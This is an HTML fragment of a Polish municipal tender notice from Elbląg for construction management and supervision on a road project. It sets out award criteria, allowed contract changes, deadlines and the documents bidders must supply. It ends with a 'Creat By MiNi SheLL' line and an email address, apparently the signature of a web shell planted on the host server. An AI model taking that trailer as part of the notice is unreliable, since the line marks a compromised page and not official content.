<p>Dokumenty stanowiące dowód, że Wykonawca będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności pisemne zobowiązanie podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby wykonania zamówienia - w przypadku Wykonawcy polegającego na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90.00</li>
<li>2 - czas - 10.00</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmianę postanowień niniejszej umowy w następujących przypadkach:
1) Zmiany stawki podatku od towarów i usług, w takim przypadku wynagrodzenie brutto, o którym mowa w § 3, ust. 1 ulegnie zmianie.
2) Likwidacji lub rozwiązania firmy Inżyniera.
3) Konieczność wykonania prac wynikających z zaleceń organów administracji architektoniczno-budowlanej, np. nadzoru budowlanego, wydanych stosownie do ich właściwości.
4) Zmiana wymagań związanych ze zmianą lub wydaniem nowych pozwoleń na budowę dla realizowanych zamówień, wynikających z konieczności wykonania robót zamiennych niewykraczających poza zakres przedmiotu zamówienia i koniecznych dla wykonania całości robót i uzyskania założonego efektu użytkowego.
5) Zmiana terminu umowy z powodu:
a. Działania Siły Wyższej, tj. wyjątkowego zdarzenia lub okoliczności; Nie uważa się za czynnik zakłócający wpływ czynników atmosferycznych w czasie realizacji robót, który przy składaniu ofert musi być normalnie brany pod uwagę (wyjątek stanowią przeszkody atmosferyczne o charakterze katastrof).
b.Z przyczyn zależnych od Zamawiającego w przypadku gdy wykonanie realizacji zadania nie leży w interesie publicznym.
c.Zmiany terminu realizacji kontraktu na roboty budowlane tj. skrócenia lub wydłużenia terminów określonych w § 2.
d.Wystąpienia znalezisk archeologicznych, występowania niewybuchów, które mogą skutkować w świetle dotychczasowych założeń niewykonaniem lub nienależytym wykonaniem przedmiotu umowy.
6) W przypadkach zmiany:
a. stawki podatku od towarów i usług, w takim przypadku wynagrodzenie brutto ulegnie zmianie.
b. wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,
c. zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne,
- jeżeli zmiany te będą miały wpływ na koszty wykonania przez Wykonawcę przedmiotu umowy, każda ze stron umowy, w terminie 30 dni od dnia wejścia w życie przepisów dokonujących tych zmian, może zwrócić się do drugiej strony o przeprowadzenie negocjacji w sprawie zmiany wynagrodzenia, obowiązek wykazania zmiany rzeczywiście ponoszonych kosztów z uwagi na w/w zmiany należy do strony która wystąpi z wnioskiem o przeprowadzenie negocjacji.
Zmiana wynagrodzenia może nastąpić wyłącznie w odniesieniu do niezrealizowanej części zamówienia.
W przypadku zmiany, o której mowa w ppkt a). Wykonawca do określonego w ofercie wynagrodzenia w odniesieniu do niezrealizowanej części zamówienia zastosuje aktualnie obowiązującą stawkę podatku od towarów i usług.
W przypadku zmiany, o której mowa w ppkt b) zmiana wynagrodzenia Wykonawcy w odniesieniu do niezrealizowanej części zamówienia może nastąpić jedynie w przypadku zmiany wynagrodzenia osób zatrudnionych u Wykonawcy na podstawie umowy o pracę, które bezpośrednio wykonują zamówienie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umelblag.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Elblągu Referat Zamówień Publicznych pokój 404, 82-300 Elbląg ul. Łączności 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.07.2016 godzina 09:30, miejsce: Urząd Miejski w Elblągu Referat Zamówień Publicznych pokój 403 82-300 Elbląg ul. Łączności 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Dotyczy Sekcji II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA 

1.W zakresie zarządzania i nadzoru w czasie realizacji robót budowlanych związanych z realizacją inwestycji:
Termin rozpoczęcia: w dniu podpisania umowy
Termin zakończenia: do 30.09.2017 r.

2.Termin wykonania raportu, o którym mowa w pkt III ppkt 2 poz. 5) SIWZ: 14 dni od przekazania dokumentacji projektowej przez Zamawiającego.

3.Termin wykonania przedmiarów w układzie specyfikacyjnymi, o których mowa w pkt III ppkt 2 poz. 6) SIWZ i wykonania Zastąpienie znaków handlowych w dokumentacji projektowej budowy oświetlenia, o którym mowa w pkt III ppkt 2 poz. 7) SIWZ: 20 dni od przekazania dokumentacji projektowej przez Zamawiającego. 

4.Termin w zakresie rozliczenia inwestycji i przygotowania przekazania środków trwałych: 30 dni od daty podpisania protokołu  końcowego odbioru robót, związanych z realizacją inwestycji.

5.Termin w zakresie obsługi okresu gwarancyjnego: od daty podpisania protokołu końcowego odbioru robót do 60 miesięcy.

2. Dotyczy Sekcji IV. 2) KRYTERIA OCENY OFERT   
    CENA -  90%
czas w jakim osoby pełniące funkcje inspektorów nadzoru w zespole Inżyniera Budowy, w tym Inżynier Budowy stawią się na terenie budowy lub w siedzibie Zamawiającego przy ul. Czerwonego Krzyża 2 w Elblągu, po wezwaniu przez Zamawiającego, licząc od wezwania Zamawiającego - 10% 

3. Uwaga do oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ:
a)	Treść wymaganego Oświadczenia w zakresie art. 22 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przekazuje na ZAŁĄCZNIKU NR 2a do SIWZ. Oświadczenie należy składać w oryginale.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymagane oświadczenie może być złożone przez pełnomocnika w imieniu wszystkich Wykonawców lub przez wszystkich Wykonawców na jednym dokumencie lub przez każdego Wykonawcę odrębnie (jeżeli każdy z Wykonawców spełnia warunki udziału samodzielnie).
 
4. Uwaga do dokumentu wymienionego w pkt VI. ppkt 1.2. SIWZ: 
  a) Dowodami, o których mowa powyżej są:
      - poświadczenie,
-oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej. 
   b)W przypadku, gdy podmiotem, na rzecz którego usługi wskazane w wykazie zostały wcześniej wykonywane jest Gmina Miasto Elbląg, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej w pkt a). 
   c)Obowiązek wykazania przez Wykonawcę w wykazie dotyczy usług polegających na zarządzaniu i nadzorze nad realizacją zadania inwestycyjnego polegającego na budowie lub przebudowie dróg  zlokalizowanych w całości w obszarze zabudowanym, w tym dotycząca zarządzania i nadzoru nad realizacją zadania inwestycyjnego polegającego na budowie lub przebudowie drogi o nawierzchni z kostki kamiennej zlokalizowanej w obszarze objętym ochroną konserwatora zabytków. 
   d)Dowody, że usługi zostały wykonane należycie, należy złożyć tylko do wskazanych w wykazie usług, o których mowa w sekcji III.3.2) ogłoszenia.
   e)Przedmiot wykazanych usług należy podać z taką szczegółowością, która umożliwi Zamawiającemu sprawdzenie spełniania warunku określonego w sekcji III.3.2) ogłoszenia.
f)Wykaz należy sporządzić na druku zgodnie ze wzorem stanowiącym ZAŁACZNIK NR 5 do SIWZ WYKAZ 
  USŁUG.
   g)Wartości podane w walutach innych niż wskazane przez Zamawiającego dla wartości usług wykonanych należy przeliczyć wg średniego kursu NBP na dzień zakończenia wykonywania usług, podając datę i kurs. 
   h)W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa ten lub ci z Wykonawców, którzy w imieniu wszystkich wskazywać będą spełnianie warunku określonego w sekcji III.3.2) ogłoszenia.
i)	Wykonawca, który polega na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.

5. Uwaga do oświadczenia wymienionego w pkt VI. ppkt 1.3. SIWZ: 
  a) Wykaz należy sporządzić na druku zgodnie ze wzorem stanowiącym ZAŁĄCZNIK NR 6 do SIWZ WYKAZ OSÓB.
  b) Dla osób wskazanych w wykazie na potwierdzenie spełniania warunku określonego w pkt V. ppkt 3.  
      SIWZ należy podać następujące informacje: 
       -	dla osoby, o której mowa w sekcji III.3.4) lit. a. ogłoszenia należy podać liczbę lat doświadczenia jako inspektor nadzoru w swojej branży, rodzaj posiadanych uprawnień, opisać doświadczenie w nadzorowaniu i zarządzaniu przynajmniej 2 kontraktami, związanymi z realizacją inwestycji dotyczącej budowy lub przebudowy dróg zlokalizowanych w całości w obszarze zabudowanym, w tym jedno zadanie musi dotyczyć zarządzania i nadzoru nad realizacją zadania inwestycyjnego polegającego na budowie lub przebudowie drogi o nawierzchni z kostki kamiennej zlokalizowanej w obszarze objętym ochroną konserwatora zabytków,  
       - dla osób, o których mowa w sekcji III.3.4) ogłoszenia lit. b), c), d), e) SIWZ należy podać rodzaj posiadanych uprawnień oraz liczbę lat doświadczenia jako inspektor nadzoru w swojej branży,
   c)	W informacji o podstawie do dysponowania osobami należy podać informację, czy Wykonawca dysponuje osobami na podstawie umowy zawartej między Wykonawcą a tymi osobami określając rodzaj tej umowy, np. czy jest to umowa o pracę czy też umowa cywilno-prawna, lub że dysponuje tymi osobami na podstawie art. 26 ust. 2b ustawy Prawo zamówień publicznych załączając dowód, że będzie dysponował tymi osobami w trakcie realizacji zamówienia, w szczególności pisemne zobowiązanie podmiotów (oryginał lub kopia poświadczona za zgodność z oryginałem przez te podmioty).
   d)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymieniony dokument Wykonawcy składają wspólnie.
e)	Wykonawca, który polega na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.

6. Uwaga do oświadczenia wymienionego w pkt VI. ppkt 1.4. SIWZ: 
    a) Oświadczenie należy złożyć na druku zgodnie ze wzorem stanowiącym ZAŁĄCZNIK NR 6 do 
        SIWZ WYKAZ OSÓB. 
    b) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie 
        Wykonawcy składają wspólnie.

7. Uwaga do oświadczenia wymienionego w pkt VI.A. ppkt 1. SIWZ:
a)	Treść wymaganego Oświadczenia Zamawiający przekazuje na ZAŁĄCZNIKU NR 2b do SIWZ.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.

8.Uwaga do dokumentu wymienionego w pkt VI.A. ppkt 2. SIWZ:
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.

9.Uwaga do dokumentu wymienionego w pkt VI.A. ppkt 3. SIWZ:
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.

10.Uwaga do dokumentu wymienionego w pkt VI.A. ppkt 4. SIWZ:
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia

11. Uwaga do dokumentu wymienionego w pkt VI.A. ppkt 5. SIWZ:
a)	Informację o przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Prawo zamówień publicznych należy złożyć zgodnie ze wzorem stanowiącym ZAŁĄCZNIK NR 4 do SIWZ.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. 

12. Dotyczy Sekcji III.4.3) Dokumenty podmiotów zagranicznych:
Jeżeli w kraju miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w sekcji III.4.3.1) ogłoszenia, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Dokumenty, o których mowa powyżej, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

15. Opłata za SIWZ obejmuje koszty jej druku oraz przekazania.

16. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów i oświadczeń  wymienionych w pkt VI.1. SIWZ, metodą spełnia / nie spełnia.
  
  17. Warunki udziału, o których mowa w art. 22 ust. 1 ustawy oraz opis sposobu dokonania oceny ich spełniania mają na celu zweryfikowanie zdolności wykonawcy do należytego wykonania udzielanego zamówienia.
UWAGA: 
Zgodnie z art. 26 ust. 2b ustawy Prawo zamówień publicznych Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z ust. 2b, odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com